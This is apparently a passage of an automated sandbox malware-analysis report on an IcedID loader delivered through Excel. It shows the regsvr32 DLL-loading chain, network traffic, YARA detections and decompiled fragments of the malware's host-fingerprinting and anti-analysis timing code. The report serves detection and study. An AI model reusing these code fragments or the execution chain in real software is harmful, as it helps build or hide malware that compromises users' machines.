65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 17:07:19.395132065 CEST	325	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 6, 2021 17:07:17.579943895 CEST	13.224.92.73	443	192.168.2.22	49168	CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2740 Parent PID: 584

General

Start time:	17:06:36
Start date:	06/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f270000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3052 Parent PID: 2740

General

Start time:	17:06:38
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XRAY.dll
Imagebase:	0xff020000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2076 Parent PID: 2740

General

Start time:	17:06:38
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XTOWN.dll
Imagebase:	0xff020000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp, Author: Joe Security Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2089712522.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2356 Parent PID: 2740

General

Start time:	17:06:42
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XZIBIT.dll
Imagebase:	0xff020000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2076 Parent PID: 2740 regsvr32.exeCOMMON

Executed Functions

Function 005127BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E005127BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00512990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x5170c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00512990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}

0x005127bc
0x005127bc
0x005127bc
0x005127bf
0x005127c3
0x005127c7
0x005127cb
0x005127d4
0x005127d7
0x005127e7
0x005127ea
0x005127fa
0x00512800
0x00512806
0x0051285f
0x0051285f
0x00512876
0x0051287b
0x00512893
0x00512893
0x0051280f
0x00512814
0x0051281f
0x0051282c
0x0051282c
0x0051282f
0x00512835
0x0051283b
0x00000000
0x00000000
0x00512842
0x00512845
0x00512849
0x00512894
0x00512897
0x0051289e
0x005128a9
0x005128b5
0x005128b7
0x005128ba
0x005128c1
0x005128c8
0x005128cd
0x005128d0
0x005128d0
0x005128b5
0x005128d7
0x005128da
0x005128df
0x005128e8
0x005128ed
0x005128f6
0x00000000
0x00000000
0x00000000
0x005128fc
0x0051284b
0x00512854
0x00512859
0x00512859

APIs

GetAdaptersInfo.IPHLPAPI(?,?,00000000,00512CFE,?,?,00000003,005124A4), ref: 0051280F
GetAdaptersInfo.IPHLPAPI(?,?,00000000,00512CFE,?,?,00000003,005124A4), ref: 00512845

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction ID: aa3f79eacae2bf00e17c9bdd819532a3214218f1def027661a48f84627f415a1
Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction Fuzzy Hash: 4D318F75605B84A2FB15DB66E8187DA7BA0FB49F95F484425CF0D0B714EF38C689CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00511810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 00511A08

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction ID: dd5f7c4e6fe73b474fefc2841518d560c427ccfcc61f0dd1379c1fa8466e1896
Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction Fuzzy Hash: C071AA72301F8197EB24CF66E840BEA3BA1FB48B95F4885259F4A47B14DF38C595CB44

Uniqueness

Uniqueness Score: -1.00%

Function 005122DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

LookupAccountNameW.ADVAPI32 ref: 0051233C

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: AccountLookupName
String ID:
API String ID: 1484870144-0
Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction ID: 445e8f3ccf21e81b8a81914fe884aee438c566179c91d2013dec3fff4141481b
Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction Fuzzy Hash: 2031AB72701F418AEB108FB6E8483DA77A0FB48B88F585535DA4D47B18EF38C698CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00511678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,00000000,00512CB1,?,?,00000003,005124A4), ref: 005116CB

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction ID: 9117af97e877b18f5d463581868db26a6043c2ff178e86d6b39a14e4b0ac270d
Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction Fuzzy Hash: E4216B75315F4082FB05DB66AC483EA66A1FB89BC2F185474DF0A4B794EF2CC9858B04

Uniqueness

Uniqueness Score: -1.00%

Function 00512434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00512434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E005111FC(_t73 - 0x29, _t52);
					_t37 = E0051153C(_t73 - 0x29);
					E00512C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00511EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0051272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00511FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00512A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}

0x00512434
0x00512434
0x00512434
0x00512434
0x00512434
0x00512434
0x00512434
0x00512439
0x0051243f
0x0051244d
0x0051244d
0x0051244d
0x00512512
0x00512528
0x00512450
0x00512454
0x00512456
0x0051245a
0x00512460
0x00512468
0x0051246e
0x00512472
0x00000000
0x00512474
0x00512482
0x0051248c
0x0051249d
0x0051249f
0x005124a4
0x005124a7
0x005124b0
0x005124bf
0x005124c1
0x005124cc
0x005124d2
0x005124d7
0x005124db
0x005124e0
0x005124e2
0x005124f0
0x005124f0
0x005124fc
0x00512501
0x00512504
0x0051250d
0x0051250d
0x00512504
0x005124cc
0x005124bf
0x00000000
0x005124a7

APIs

SleepEx.KERNEL32 ref: 00512468

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction ID: 81d59f2ca936e9a0c44a1a4635460274be7988a8b42c16226a875026aab5fdbd
Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction Fuzzy Hash: 0521A176300E419AEF10DFB2E8583DE27A2F788784F494426DF4D5B648EE38D599C750

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB13FA

Strings

7, xrefs: 000007FEF8FB14E1
G, xrefs: 000007FEF8FB1448
EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl, xrefs: 000007FEF8FB13FD
2, xrefs: 000007FEF8FB14F9
G, xrefs: 000007FEF8FB141B
G, xrefs: 000007FEF8FB1431
G, xrefs: 000007FEF8FB137C
G, xrefs: 000007FEF8FB1426
G, xrefs: 000007FEF8FB15AF
G, xrefs: 000007FEF8FB1458

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
API String ID: 4275171209-1517691801
Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 000007FEF8FB11EC
GetThreadPriority.KERNEL32 ref: 000007FEF8FB11FA
GetCurrentThread.KERNEL32 ref: 000007FEF8FB1204
CreateThread.KERNEL32 ref: 000007FEF8FB123C
WaitForSingleObject.KERNEL32 ref: 000007FEF8FB124F
DuplicateHandle.KERNEL32 ref: 000007FEF8FB128D

Strings

G, xrefs: 000007FEF8FB12DF
_, xrefs: 000007FEF8FB1293
DllRegisterServer, xrefs: 000007FEF8FB12F6

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
String ID: DllRegisterServer$G$_
API String ID: 1174013218-1650116920
Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB220B

Strings

@, xrefs: 000007FEF8FB21E1

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: @
API String ID: 4275171209-2766056989
Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01

Uniqueness

Uniqueness Score: -1.00%

Function 005110AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 005110B7
RtlExitUserProcess.NTDLL ref: 005110C8

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: ExitProcessSleepUser
String ID:
API String ID: 354099737-0
Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction ID: 0d35b3921f60e7d2abbf942edec47c4ab746fb13b6bece7afed1bb8d9e233b91
Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction Fuzzy Hash: B4C01234900E80C3F21DA762AE8C3AA2224A348307F010A198302096A08F3804C88E0B

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000007FEF8FB327B

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40

Uniqueness

Uniqueness Score: -1.00%

Function 0051260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00511E13), ref: 0051264B

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction ID: 901d34b1e3633107dfb633cad4d1054f65996667ee03f416128f840259446e5c
Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction Fuzzy Hash: E7E06D32624A45C2EB10EB25EC583DA3370FB9C705F840122859E066A0EF2CCB9DCF00

Uniqueness

Uniqueness Score: -1.00%

Function 00511000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00511022

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction ID: c9c82e14454e86882217cf7d729e43aa62035a12fb4a4eed43083f43d2a0201f
Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction Fuzzy Hash: 86D0A772E10A4083F7308710EE5A3DA2712F3D8316F804206D64948554CF3CC298CE08

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

%, xrefs: 000007FEF8FB17B2

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2093764873.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093761222.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093769566.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093776337.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093780241.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00511E50, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00511E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
